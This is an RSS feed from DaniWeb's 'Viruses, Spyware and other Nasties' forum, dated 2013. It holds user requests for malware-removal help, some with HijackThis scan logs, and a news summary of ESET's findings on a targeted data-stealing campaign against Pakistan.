<?xml version="1.0" encoding="utf-8" ?><?xml-stylesheet type="text/xsl" href="http://www.daniweb.com/js/rss.xsl"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>DaniWeb IT Discussion Community - Viruses, Spyware and other Nasties</title>
		<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64</link>
		<description>Our Viruses, Spyware and other Nasties forum is the place for Q&amp;A-style discussions related to Windows security. Post a HijackThis log here if you think you've got viruses, spyware, adware, malware, or other unwanted guests.</description>
		<language>en-US</language>
		<ttl>60</ttl>
		<!-- PubSubHubbub Discovery -->
		<link rel="hub" href="http://daniweb.superfeedr.com/" xmlns="http://www.w3.org/2005/Atom" />
		<link rel="hub" href="http://pubsubhubbub.superfeedr.com/" xmlns="http://www.w3.org/2005/Atom" />
		<link rel="hub" href="http://pubsubhubbub.appspot.com/" xmlns="http://www.w3.org/2005/Atom" />
		<link rel="self" href="http://www.daniweb.com/rss/pull/64" xmlns="http://www.w3.org/2005/Atom" />
		<!-- End Of PubSubHubbub Discovery -->
				<item>
			<title>Help me my pc wont let me do anything :/</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456794/help-me-my-pc-wont-let-me-do-anything-</link>
			<pubDate>Sun, 16 Jun 2013 20:00:13 +0000</pubDate>
			<description>Hi, basically my laptop won't let me do anything. It won't connect to an internet connection, it doesn't recognise any USB, services won't work, system restore doesn't work, a lot of settings don't work, most things I click on, a message pops up saying &quot;The specified service does not exist ...</description>
			<content:encoded><![CDATA[ <p>Hi, basically my laptop won't let me do anything. It won't connect to an internet connection, it doesn't recognise any USB, services won't work, system restore doesn't work, a lot of settings don't work, most things I click on, a message pops up saying "The specified service does not exist as an installed service." Basically the only thing I can do is go through pictures and other files. I can't even create a new user or anything. Please help xX</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>clayden</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456794/help-me-my-pc-wont-let-me-do-anything-</guid>
		</item>
				<item>
			<title>search.us.com</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456756/search.us.com</link>
			<pubDate>Sun, 16 Jun 2013 08:31:27 +0000</pubDate>
			<description> I have just tried removing search.us.com from my computer both in Chrome and Firefox - using Windows XP operating system I have tried the following programs which all say they can remove it Spyhunter Hitman Pro Malwarebytes with no success Has anyone a suggestion on how to get rid of ...</description>
			<content:encoded><![CDATA[ <p>I have just tried removing search.us.com from my computer both in Chrome and Firefox - using Windows XP operating system<br />
I have tried the following programs which all say they can remove it<br />
Spyhunter<br />
Hitman Pro<br />
Malwarebytes<br />
with no success</p>

<p>Has anyone a suggestion on how to get rid of it?<br />
Thanks<br />
bgrimwade</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>bgrimwade</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456756/search.us.com</guid>
		</item>
				<item>
			<title>Panda Global Security 2013 (Cloud)</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456282/panda-gloval-security-2013-cloud</link>
			<pubDate>Sun, 09 Jun 2013 22:10:01 +0000</pubDate>
			<description>I got malware from something that I thought was Adobe Flash. It was not; I deleted it from control panel. I still had sweetpacks, a toolbar that would not go away. It was not in my control panel. I had one dialogue box and I contacted Panda, they did four remotes ...</description>
			<content:encoded><![CDATA[ <p>I got malware from something that I thought was Adobe Flash. It was not; I deleted it from control panel. I still had sweetpacks, a toolbar that would not go away. It was not in my control panel. I had one dialogue box and I contacted Panda, they did four remotes on my computer. Each time they did a remote on my computer--I got more dialogue boxes.  It got so bad that I had to use ctrl, alt, del, to get out of my internet and that to shut down my computer. I had to finally do a restoration on my computer because of the following dialogue boxes:  Pcloudcleaner (Access violation at address 718B6632, 71536632, 70C96632, 70DB6632 in module "MSVCR90.dll". Read of address A4EA131, A4EA6035, A4EA4349, A4EA224D, 539BAB01, 8BEEA4BC, 00000004).  I got this from using their new antivirus Cloud cleaner.</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>Iboney</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456282/panda-gloval-security-2013-cloud</guid>
		</item>
				<item>
			<title>Can u give more abt shortcut virus. . how they are created ? how it affect.</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456200/can-u-give-more-abt-shortcut-virus.-.-how-they-are-created-how-it-affect</link>
			<pubDate>Sat, 08 Jun 2013 07:15:17 +0000</pubDate>
			<description>How are shortcut viruses created? How do they turn folders into shortcut files?</description>
			<content:encoded><![CDATA[ <p>How are shortcut viruses created? How do they turn folders into shortcut files?</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>killer88</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456200/can-u-give-more-abt-shortcut-virus.-.-how-they-are-created-how-it-affect</guid>
		</item>
				<item>
			<title>Internet explorer keeps opening pages and refreshing itself on its own</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456131/internet-explorer-keeps-opening-pages-and-refreshing-itself-on-its-own</link>
			<pubDate>Fri, 07 Jun 2013 02:28:50 +0000</pubDate>
			<description>I am about at my wits' end with this laptop. For no apparent reason and nothing setting it off, Internet Explorer, as well as other browsers in the past, keep opening themselves up, refreshing and eventually rendering it unusable. I have run Malwarebytes, McAfee antivirus, all sorts of other programs ...</description>
			<content:encoded><![CDATA[ <p>I am about at my wits' end with this laptop.  For no apparent reason and nothing setting it off, Internet Explorer, as well as other browsers in the past, keep opening themselves up, refreshing and eventually rendering it unusable.  I have run Malwarebytes, McAfee antivirus, all sorts of other programs and they have all found nothing.  I have reformatted and reimaged Windows 7 at least three times now and it still does it.  I just reimaged yesterday and am still having the problem.  I downloaded HijackThis and saved a log and here it is...PLEASE HELP ME!!  Thank You!!</p>

<p>Logfile of Trend Micro HijackThis v2.0.4<br />
Scan saved at 10:21:13 PM, on 6/6/2013<br />
Platform: Windows 7 SP1 (WinNT 6.00.3505)<br />
MSIE: Internet Explorer v8.00 (8.00.7601.17514)<br />
Boot mode: Normal</p>

<p>Running processes:<br />
C:\Program Files (x86)\HP SimplePass 2011\TouchControl.exe<br />
C:\Program Files (x86)\HP SimplePass 2011\BioMonitor.exe<br />
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe<br />
C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe<br />
C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe<br />
C:\Users\Stacy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1IQ33ZZA\HijackThis[1].exe</p>

<p>R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = <a href="http://go.microsoft.com/fwlink/?LinkId=54896" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=54896</a><br />
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="http://go.microsoft.com/fwlink/?LinkId=69157" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=69157</a><br />
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = <a href="http://go.microsoft.com/fwlink/?LinkId=69157" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=69157</a><br />
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = <a href="http://go.microsoft.com/fwlink/?LinkId=54896" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=54896</a><br />
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = <a href="http://go.microsoft.com/fwlink/?LinkId=54896" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=54896</a><br />
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="http://go.microsoft.com/fwlink/?LinkId=69157" rel="nofollow">http://go.microsoft.com/fwlink/?LinkId=69157</a><br />
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =<br />
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =<br />
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm<br />
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =<br />
F2 - REG:system.ini: UserInit=userinit.exe<br />
O2 - BHO: TSBHO Class - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2011\IEBHO.dll<br />
O4 - HKLM..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun<br />
O4 - HKLM..\Run: [HP Quick Launch] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe<br />
O4 - HKLM..\Run: [HPOSD] C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe<br />
O4 - HKLM..\Run: [HPConnectionManager] C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPCMDelayStart.exe<br />
O23 - Service: Andrea ST Filters Service (AESTFilters) - Andrea Electronics Corporation - C:\Program Files\IDT\WDM\AESTSr64.exe<br />
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)<br />
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)<br />
O23 - Service: AMD FUEL Service - Advanced Micro Devices, Inc. - C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe<br />
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)<br />
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)<br />
O23 - Service: TrueSuiteService (FPLService) - HP - C:\Program Files (x86)\HP SimplePass 2011\TrueSuiteService.exe<br />
O23 - Service: HP Health Check Service - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe<br />
O23 - Service: HP Connection Manager 4.0 Service (hpCMSrv) - Hewlett-Packard Development Company L.P. - C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\hpCMSrv.exe<br />
O23 - Service: HP Quick Synchronization Service (HPDrvMntSvc.exe) - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe<br />
O23 - Service: HP Software Framework Service (hpqwmiex) - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe<br />
O23 - Service: HP Service (hpsrv) - Unknown owner - C:\Windows\system32\Hpservice.exe (file missing)<br />
O23 - Service: HPWMISVC - Hewlett-Packard Development Company, L.P. - C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe<br />
O23 - Service: IconMan_R - Realsil Microelectronics Inc. - C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe<br />
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)<br />
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)<br />
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)<br />
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)<br />
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)<br />
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)<br />
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)<br />
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)<br />
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)<br />
O23 - Service: @%SystemRoot%\system32\stlang64.dll,-10101 (STacSV) - IDT, Inc. - C:\Program Files\IDT\WDM\STacSV64.exe<br />
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)<br />
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)<br />
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)<br />
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)<br />
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)<br />
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)<br />
O23 - Service: WMPNetworkSvc - Unknown owner - (no file)</p>

<p>--<br />
End of file - 6203 bytes</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>scottys623</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456131/internet-explorer-keeps-opening-pages-and-refreshing-itself-on-its-own</guid>
		</item>
				<item>
			<title>Internet browser keeps starting up by itself, and constantly refreshing</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455980/internet-browser-keeps-starting-up-by-itself-and-constantly-refreshing</link>
			<pubDate>Wed, 05 Jun 2013 04:09:26 +0000</pubDate>
			<description>Hi, my internet browser keeps turning on by itself randomly. I did a lot of virus checks and still no luck. It seems to be a deeply rooted virus. I changed the default browser, but it doesn't matter, internet browser just keeps turning on at random times, and sometimes, several times.</description>
			<content:encoded><![CDATA[ <p>Hi, my internet browser keeps turning on by itself randomly. I did a lot of virus checks and still no luck. It seems to be a deeply rooted virus. I changed the default browser, but it doesn't matter, internet browser just keeps turning on at random times, and sometimes, several times.</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>inaams14</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455980/internet-browser-keeps-starting-up-by-itself-and-constantly-refreshing</guid>
		</item>
				<item>
			<title>need help with very nasty virus,</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455949/need-help-with-very-nasty-virus</link>
			<pubDate>Tue, 04 Jun 2013 14:29:08 +0000</pubDate>
			<description>Ok, so the OS is Windows 7 and here is what's happening. He caught it once and we were able to remove it but we can't do it by the same means this time, anyways here's what it's doing.. Task Manager is disabled. Desktop is gone, no start bar, NO SAFE ...</description>
			<content:encoded><![CDATA[ <p>Ok, so the OS is Windows 7 and here is what's happening.</p>

<p>He caught it once and we were able to remove it but we can't do it by the same means this time,</p>

<p>anyways here's what it's doing..</p>

<p>Task Manager is disabled.<br />
Desktop is gone,<br />
no start bar,<br />
NO SAFE MODE</p>

<p>Every time we try to go into safe mode, as soon as we log in it restarts. So safe mode is out of the question.</p>

<p>A white screen pops up for 2 seconds in normal mode. And if you hit the power button to shut it off you can see all the stuff running in the background like AVG and HITMAN saying it's infected, then it restarts.</p>

<p>It was, if I remember,<br />
trojan cryptik.H</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>strawhat068</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455949/need-help-with-very-nasty-virus</guid>
		</item>
				<item>
			<title>What is TryBarAPPAV</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455845/what-is-trybarappav</link>
			<pubDate>Mon, 03 Jun 2013 06:45:12 +0000</pubDate>
			<description>Recently, each time I am closing down WinXP I get this: &quot;Ending Program TryBarAPPAV&quot;. Does anyone know of this application/program? I tried googling it and it only shows responses in Spanish which I cannot read or understand. Of late my PC (WinXP) has become very slow and the commit charge ...</description>
			<content:encoded><![CDATA[ <p>Recently, each time I am closing down WinXP I get this: "Ending Program TryBarAPPAV". Does anyone know of this application/program? I tried googling it and it only shows responses in Spanish which I cannot read or understand. Of late my PC (WinXP) has become very slow and the commit charge in Task Manager goes sky high.  I would appreciate any and all help re TryBarAppAV. Could it be a virus?</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>chukeej</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455845/what-is-trybarappav</guid>
		</item>
				<item>
			<title>PLEASE-Need a little Help--Running very slow</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455733/please-need-a-little-help-running-very-slow</link>
			<pubDate>Sat, 01 Jun 2013 00:27:48 +0000</pubDate>
			<description>Hello, Could use a little help please. I can't update to SP2 for Vista and have not been able to update in almost a year. My Windows Media Player plays all songs but very choppy. They do work fine on other computers. Vista is terrible so any help to make ...</description>
			<content:encoded><![CDATA[ <p>Hello,<br />
Could use a little help please.  I can't update to SP2 for Vista and have not been able to update in almost a year.  My Windows Media Player plays all songs but very choppy.  They do work fine on other computers.  Vista is terrible so any help to make it a little better would be appreciated. My log is as follows:</p>

<p>Logfile of Trend Micro HijackThis v2.0.2<br />
Scan saved at 5:06:47 PM, on 8/14/2009<br />
Platform: Windows Vista SP1 (WinNT 6.00.1905)<br />
MSIE: Internet Explorer v7.00 (7.00.6001.18226)<br />
Boot mode: Normal</p>

<p>Running processes:<br />
C:\Program Files\Dell\DellDock\DellDock.exe<br />
C:\Windows\system32\taskeng.exe<br />
C:\Windows\system32\Dwm.exe<br />
C:\Windows\Explorer.EXE<br />
C:\Windows\system32\igfxsrvc.exe<br />
C:\Program Files\Common Files\Dell\apache\bin\httpd.exe<br />
C:\PROGRA~1\McAfee.com\Agent\mcagent.exe<br />
C:\Program Files\Dell DataSafe Local Backup\Components\scheduler\STService.exe<br />
C:\Program Files\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe<br />
C:\Program Files\DellTPad\Apoint.exe<br />
C:\Program Files\IDT\WDM\sttray.exe<br />
C:\Windows\System32\igfxtray.exe<br />
C:\Windows\System32\hkcmd.exe<br />
C:\Windows\System32\igfxpers.exe<br />
C:\Windows\System32\WLTRAY.EXE<br />
C:\Program Files\Dell\QuickSet\quickset.exe<br />
C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe<br />
C:\Program Files\Dell DataSafe Online\DataSafeOnline.exe<br />
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe<br />
C:\Program Files\QuickTime\qttask.exe<br />
C:\Program Files\iTunes\iTunesHelper.exe<br />
C:\Program Files\Dell Support Center\bin\sprtcmd.exe<br />
C:\Program Files\Windows Sidebar\sidebar.exe<br />
C:\Program Files\DellTPad\ApMsgFwd.exe<br />
C:\Program Files\DellTPad\Apntex.exe<br />
C:\Program Files\DellTPad\HidFind.exe<br />
C:\Program Files\Windows Media Player\WMPNSCFG.exe<br />
C:\Windows\system32\taskeng.exe<br />
C:\Windows\system32\SearchFilterHost.exe<br />
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe</p>

<p>O23 - Service: Remote Access DB (dsl-db) - Unknown owner - C:\Program Files\Common Files\Dell\MySQL\bin\mysqld.exe<br />
O23 - Service: Remote Access File Sync Service (dsl-fs-sync) - SingleClick Systems - C:\Program Files\Common Files\Dell\Remote Access File Sync Service\dsl_fs_sync.exe<br />
O23 - Service: GameConsoleService - WildTangent, Inc. - C:\Program Files\WildTangent\Dell Games\Dell Game Console\GameConsoleService.exe<br />
O23 - Service: GoToAssist - Citrix Online, a division of Citrix Systems, Inc. - C:\Program Files\Citrix\GoToAssist\514\g2aservice.exe<br />
O23 - Service: Advanced Networking Service (hnmsvc) - Dell Inc. - c:\Program Files\Common Files\Dell\Advanced Networking Service\hnm_svc.exe<br />
O23 - Service: Intel(R) Matrix Storage Event Monitor (IAANTMON) - Intel Corporation - C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTMon.exe<br />
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe<br />
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\Program Files\McAfee\MSC\mcmscsvc.exe<br />
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - C:\Program Files\Common Files\mcafee\mna\mcnasvc.exe<br />
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\Program Files\McAfee\VIRUSS~1\mcods.exe<br />
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - C:\PROGRA~1\COMMON~1\McAfee\McProxy\McProxy.exe<br />
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe<br />
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe<br />
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Program Files\McAfee\MPF\MPFSrv.exe<br />
O23 - Service: McAfee Anti-Spam Service (MSK80Service) - McAfee, Inc. - C:\Program Files\McAfee\MSK\MskSrver.exe<br />
O23 - Service: SoftThinks Agent Service (SftService) - SoftThinks - C:\Program Files\Dell DataSafe Local Backup\sftservice.EXE<br />
O23 - Service: SupportSoft Sprocket Service (DellSupportCenter) (sprtsvc_DellSupportCenter) - SupportSoft, Inc. - C:\Program Files\Dell Support Center\bin\sprtsvc.exe<br />
O23 - Service: Audio Service (STacSV) - IDT, Inc. - C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_f6ef8056\STacSV.exe<br />
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe<br />
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\Windows\System32\WLTRYSVC.EXE<br />
O23 - Service: Marvell Yukon Service (yksvc) - Unknown owner - RUNDLL32.EXE (file missing)</p>

<p>--<br />
End of file - 4153 bytes</p>

<p>Thanks in advance -Chris</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>pcmic</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455733/please-need-a-little-help-running-very-slow</guid>
		</item>
				<item>
			<title>Virus</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455298/virus</link>
			<pubDate>Sat, 25 May 2013 16:39:10 +0000</pubDate>
			<description>My PC was running slow so I scanned with Malwarebytes. I found these viruses and deleted them but each time I use the computer they re-appear again. Trojan Facebook Trojan Agent</description>
			<content:encoded><![CDATA[ <p>My PC was running slow so I scanned with Malwarebytes. I found these viruses and deleted them but each time I use the computer they re-appear again.</p>

<p>Trojan Facebook<br />
Trojan Agent</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>desmondo</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455298/virus</guid>
		</item>
				<item>
			<title>Internet Explorer keeps starting on its own.  HELP!</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455211/internet-explorer-keeps-starting-on-its-own.-help</link>
			<pubDate>Fri, 24 May 2013 01:46:31 +0000</pubDate>
			<description>Okay, so I am horrible with computers so this may be just an easy fix. For the past two days Internet Explorer keeps on starting on its own. It does not open to an actual website but in the search bar there are always random, incomplete URLs (the most recent ...</description>
			<content:encoded><![CDATA[ <p>Okay, so I am horrible with computers so this may be just an easy fix.  For the past two days Internet Explorer keeps on starting on its own.  It does not open to an actual website but in the search bar there are always random, incomplete URLs (the most recent example: <a href="http://nskduikwwxzkok/" rel="nofollow">http://nskduikwwxzkok/</a>).  It's my laptop for class so it is unbelievably annoying.</p>

<p>Please, please help me out.</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>kays109</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455211/internet-explorer-keeps-starting-on-its-own.-help</guid>
		</item>
				<item>
			<title>Indian hackers take aim at Pakistan data during two year attack</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/454905/indian-hackers-take-aim-at-pakistan-data-during-two-year-attack</link>
			<pubDate>Sun, 19 May 2013 09:13:22 +0000</pubDate>
			<description>Security researchers at ESET [have revealed](http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/) that a prolonged and highly targeted data stealing attack aimed at Pakistan, using fake PDF documents, appears to have originated in India. Using a code signing certificate (issued to what looks like a legitimate company 'Technical and Commercial Consulting Pvt. Ltd') to sign malicious ...</description>
			<content:encoded><![CDATA[ <p>Security researchers at ESET <a href="http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/" rel="nofollow">have revealed</a> that a prolonged and highly targeted data stealing attack aimed at Pakistan, using fake PDF documents, appears to have originated in India.</p>

<p>By signing malicious binaries with a code signing certificate (issued to what looks like a legitimate company, 'Technical and Commercial Consulting Pvt. Ltd'), the attackers greatly improved their chances of distributing the payload. The company concerned, ESET says, was based in New Delhi and the certificate itself was issued in 2011. Documents, mainly PDFs, attached to emails were infected with data stealing malware and signed off with the aforementioned certificate to add authenticity.</p>

<p>ESET malware researcher Jean-Ian Boutin reveals that during the investigation there were several leads that indicated the threat originates from India. "First, the code signing certificate was issued to an Indian company. In addition, all the signing timestamps are between 5:06 and 13:45 UTC, which is consistent with 8-hour work shifts falling between 10:36 and 19:15 in Indian Standard Time" he says, continuing, "we have identified several different documents that followed different themes likely to be enticing to the recipients. One of these is the Indian armed forces". Boutin admits, however, that there is no precise information at this point as to which individuals or organisations were specifically targeted by the files. "Based on our investigations," he continues, "it is our assumption that people and institutions in Pakistan were targeted".</p>

<p>One of the fake PDF files was delivered through a self-extracting archive called “pakistandefencetoindiantopmiltrysecreat.exe”, and ESET telemetry data shows that Pakistan is heavily affected by this campaign, with 79% of detections being in that country. The first infection vector exploited a widely used and abused vulnerability known as CVE-2012-0158. This vulnerability can be exploited by specially crafted Microsoft Office documents and allows arbitrary code execution. The documents were delivered by email, and the malicious code was executed as soon as the document was opened – without the attacked computer user even knowing. The other infection vector was via Windows executable files appearing to be Word or PDF documents – again distributed via email. In both cases, to evade suspicion by the victim, fake documents are shown to the user on execution.</p>

<p>"The malware was stealing sensitive data from infected PCs and sending them to the attackers’ servers," Boutin adds. "It was using various types of data-stealing techniques, among them a key-logger, taking screenshots and uploading documents to attackers’ computer. Interestingly, the information stolen from an infected computer was uploaded to the attacker’s server unencrypted."</p>

<p><img src="/attachments/fetch/L2ltYWdlcy9hdHRhY2htZW50cy8wLzk2NTVmNjJmNDhhMjUzNWY5ZjJiNDI4MzZjMTBlODU2LmpwZw%3D%3D/493" alt="9655f62f48a2535f9f2b42836c10e856" title="9655f62f48a2535f9f2b42836c10e856" /></p>

<p>As you can see from the above screenshot, several strings in the binaries analysed by ESET are related to Indian culture, in particular a variable called ramukaka was used. Boutin explains that "Ramu Kaka is a typical Bollywood-style servant in a house. Considering that this variable is responsible for achieving persistence on the system, this definition is a good fit".</p>

